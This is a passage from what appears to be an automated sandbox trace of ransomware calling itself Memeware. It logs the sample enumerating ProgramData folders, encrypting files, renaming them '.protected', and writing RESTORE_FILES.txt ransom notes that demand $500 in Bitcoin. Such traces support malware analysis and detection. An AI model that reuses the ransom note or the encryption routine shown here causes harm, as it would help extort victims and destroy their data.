pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0064.741] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0064.741] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned 66 [0064.741] StrStrW (lpFirst="AdbeRdrUpd10110_MUI.msp", lpSrch=".txt") returned 0x0 [0064.741] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned 66 [0064.741] StrStrW 
(lpFirst="AdbeRdrUpd10110_MUI.msp", lpSrch=".rar") returned 0x0 [0064.741] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned 66 [0064.741] StrStrW (lpFirst="AdbeRdrUpd10110_MUI.msp", lpSrch=".zip") returned 0x0 [0064.741] ReadFile (in: hFile=0xd4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0064.753] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.753] WriteFile (in: hFile=0xd4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0064.754] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.754] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0064.755] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0064.755] CloseHandle (hObject=0xd4) returned 1 [0064.755] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.protected") returned 76 [0064.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), 
lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.protected" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp.protected")) returned 1 [0064.756] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0064.756] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="Windows") returned -1 [0064.756] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="Program Files") returned -1 [0064.756] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="Program Files (x86)") returned -1 [0064.756] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="$Recycle.bin") returned 1 [0064.756] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="System Volume Information") returned -1 [0064.756] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned 66 [0064.756] StrStrIW (lpFirst="AdbeRdrUpd10116_MUI.msp", lpSrch=".protected") returned 0x0 [0064.756] lstrcmpW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="RESTORE_FILES.txt") returned -1 [0064.756] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0064.756] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0064.756] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0064.756] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned 66 
[0064.756] StrStrW (lpFirst="AdbeRdrUpd10116_MUI.msp", lpSrch=".txt") returned 0x0 [0064.756] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned 66 [0064.756] StrStrW (lpFirst="AdbeRdrUpd10116_MUI.msp", lpSrch=".rar") returned 0x0 [0064.756] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned 66 [0064.756] StrStrW (lpFirst="AdbeRdrUpd10116_MUI.msp", lpSrch=".zip") returned 0x0 [0064.757] ReadFile (in: hFile=0xd4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0064.780] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.780] WriteFile (in: hFile=0xd4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0064.782] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.782] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0064.783] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0064.783] CloseHandle (hObject=0xd4) returned 1 [0064.786] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.protected") returned 76 [0064.786] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.protected" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp.protected")) returned 1 [0064.787] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0064.787] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0064.787] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\RESTORE_FILES.txt") returned 60 [0064.787] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.787] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.787] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0064.788] lstrlenA (lpString="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") returned 684 [0064.788] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0064.788] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.788] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0064.789] CloseHandle (hObject=0xb4) returned 1 [0064.789] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0064.789] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0064.789] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\RESTORE_FILES.txt") returned 46 [0064.789] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\adobe\\arm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0064.789] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.789] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0064.790] lstrlenA (lpString="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") returned 684 [0064.790] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0064.790] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.790] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0064.790] CloseHandle (hObject=0xa4) returned 1 [0064.791] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0064.791] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0064.791] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\RESTORE_FILES.txt") returned 42 [0064.791] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\adobe\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0064.792] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.792] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0065.035] lstrlenA (lpString="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") returned 684 [0065.035] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0065.035] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.035] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0065.035] CloseHandle (hObject=0xac) returned 1 [0065.035] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0065.035] lstrcmpiW (lpString1="Application Data", lpString2="Windows") returned -1 [0065.035] lstrcmpiW (lpString1="Application Data", lpString2="Program Files") returned -1 [0065.035] lstrcmpiW (lpString1="Application Data", lpString2="Program Files (x86)") returned -1 [0065.035] lstrcmpiW (lpString1="Application Data", lpString2="$Recycle.bin") returned 1 [0065.036] lstrcmpiW (lpString1="Application Data", lpString2="System Volume Information") returned -1 [0065.036] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Application Data") returned 35 [0065.036] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0065.036] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0065.036] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Application Data\\*") returned 37 [0065.036] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Application Data\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0xffffffff [0065.036] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0065.036] lstrcmpiW (lpString1="Desktop", lpString2="Windows") returned -1 [0065.036] lstrcmpiW (lpString1="Desktop", lpString2="Program Files") returned -1 [0065.036] lstrcmpiW (lpString1="Desktop", lpString2="Program Files (x86)") returned -1 [0065.036] lstrcmpiW (lpString1="Desktop", lpString2="$Recycle.bin") returned 1 [0065.036] lstrcmpiW (lpString1="Desktop", lpString2="System Volume Information") returned -1 [0065.036] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Desktop") returned 26 [0065.036] lstrcmpW (lpString1="Desktop", 
lpString2=".") returned 1 [0065.036] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0065.036] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Desktop\\*") returned 28 [0065.036] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Desktop\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0xffffffff [0065.036] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0065.036] lstrcmpiW (lpString1="Documents", lpString2="Windows") returned -1 [0065.036] lstrcmpiW (lpString1="Documents", lpString2="Program Files") returned -1 [0065.036] lstrcmpiW (lpString1="Documents", lpString2="Program Files (x86)") returned -1 [0065.036] lstrcmpiW (lpString1="Documents", lpString2="$Recycle.bin") returned 1 [0065.036] lstrcmpiW (lpString1="Documents", lpString2="System Volume Information") returned -1 [0065.036] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Documents") returned 28 [0065.037] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0065.037] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0065.037] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Documents\\*") returned 30 [0065.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Documents\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0xffffffff [0065.037] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0065.037] lstrcmpiW (lpString1="Favorites", lpString2="Windows") returned -1 [0065.037] lstrcmpiW (lpString1="Favorites", lpString2="Program Files") returned -1 [0065.037] lstrcmpiW (lpString1="Favorites", lpString2="Program Files (x86)") returned -1 [0065.037] lstrcmpiW (lpString1="Favorites", lpString2="$Recycle.bin") returned 1 [0065.037] lstrcmpiW 
(lpString1="Favorites", lpString2="System Volume Information") returned -1 [0065.037] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Favorites") returned 28 [0065.037] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0065.037] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0065.037] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Favorites\\*") returned 30 [0065.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Favorites\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0xffffffff [0065.037] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0065.037] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0065.037] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0065.037] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0065.037] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0065.037] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0065.037] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft") returned 28 [0065.037] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0065.037] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0065.037] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\*") returned 30 [0065.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0065.038] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.038] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.038] lstrcmpiW (lpString1=".", lpString2="Program Files 
(x86)") returned -1 [0065.038] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.038] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.038] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\.") returned 30 [0065.038] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.038] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0065.038] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0065.038] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0065.038] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0065.038] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\." (normalized: "c:\\programdata\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.038] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0065.038] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.038] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.038] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.038] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.038] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.038] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\..") returned 31 [0065.038] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.039] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.039] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 
[0065.039] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0065.039] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0065.039] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0065.039] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\.." (normalized: "c:\\programdata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.039] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0065.039] lstrcmpiW (lpString1="Assistance", lpString2="Windows") returned -1 [0065.039] lstrcmpiW (lpString1="Assistance", lpString2="Program Files") returned -1 [0065.039] lstrcmpiW (lpString1="Assistance", lpString2="Program Files (x86)") returned -1 [0065.039] lstrcmpiW (lpString1="Assistance", lpString2="$Recycle.bin") returned 1 [0065.039] lstrcmpiW (lpString1="Assistance", lpString2="System Volume Information") returned -1 [0065.039] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance") returned 39 [0065.039] lstrcmpW (lpString1="Assistance", lpString2=".") returned 1 [0065.039] lstrcmpW (lpString1="Assistance", lpString2="..") returned 1 [0065.039] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*") returned 41 [0065.039] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0065.039] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.039] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.039] 
